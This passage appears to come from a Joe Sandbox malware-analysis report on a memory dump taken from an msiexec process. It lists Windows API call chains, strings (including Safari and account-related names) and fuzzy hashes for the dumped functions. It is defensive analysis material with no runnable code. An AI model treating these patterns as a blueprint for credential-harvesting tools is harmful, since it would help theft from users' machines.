                                                                                                     • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@FilePointermemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 609303285-0
                                                                                                    • Opcode ID: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                    • Opcode Fuzzy Hash: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2136311172-0
                                                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1936579350-0
                                                                                                    • Opcode ID: cef582a9a494f53343386042733aa5513809ed917381c834d5c32100c32837aa
                                                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                    • Opcode Fuzzy Hash: cef582a9a494f53343386042733aa5513809ed917381c834d5c32100c32837aa
                                                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 4de95ac81b56fc95cb4562d00445ef5fa655241d3aefb31a5f850866e19148c6
                                                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                    • Opcode Fuzzy Hash: 4de95ac81b56fc95cb4562d00445ef5fa655241d3aefb31a5f850866e19148c6
                                                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: d947284d6c22db8237c76381862de6f07fb40d788dfda0aa2648abdb68a845b9
                                                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                    • Opcode Fuzzy Hash: d947284d6c22db8237c76381862de6f07fb40d788dfda0aa2648abdb68a845b9
                                                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 0c5a0888377c0e205cb66d2f0871631587e8edd28856d65f4255f3fbdd23c7c5
                                                                                                    • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                    • Opcode Fuzzy Hash: 0c5a0888377c0e205cb66d2f0871631587e8edd28856d65f4255f3fbdd23c7c5
                                                                                                    • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3604893535-0
                                                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                    • API String ID: 2780580303-317687271
                                                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1213725291-0
                                                                                                    • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                    • free.MSVCRT ref: 00418370
                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                    • Opcode ID: 78d2135784b36f3903f9871ee7adf38e4db2590f8e5e3f290b233798c2ec08b4
                                                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                    • OpenClipboard.USER32(?), ref: 00411878
                                                                                                    • GetLastError.KERNEL32 ref: 0041188D
                                                                                                      • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                      • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                      • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                      • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                      • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                      • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                      • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                      • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                      • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2628231878-0
                                                                                                    • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                    • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                    • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1865533344-0
                                                                                                    • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Version
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889659487-0
                                                                                                    • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                    • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                    • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                    APIs
                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NtdllProc_Window
                                                                                                    • String ID:
                                                                                                    • API String ID: 4255912815-0
                                                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                    APIs
                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                    • API String ID: 577499730-1134094380
                                                                                                    • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                    • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                    • GetDC.USER32 ref: 004140E3
                                                                                                    • wcslen.MSVCRT ref: 00414123
                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                    • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                    • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                    APIs
                                                                                                    • EndDialog.USER32(?,?), ref: 00413221
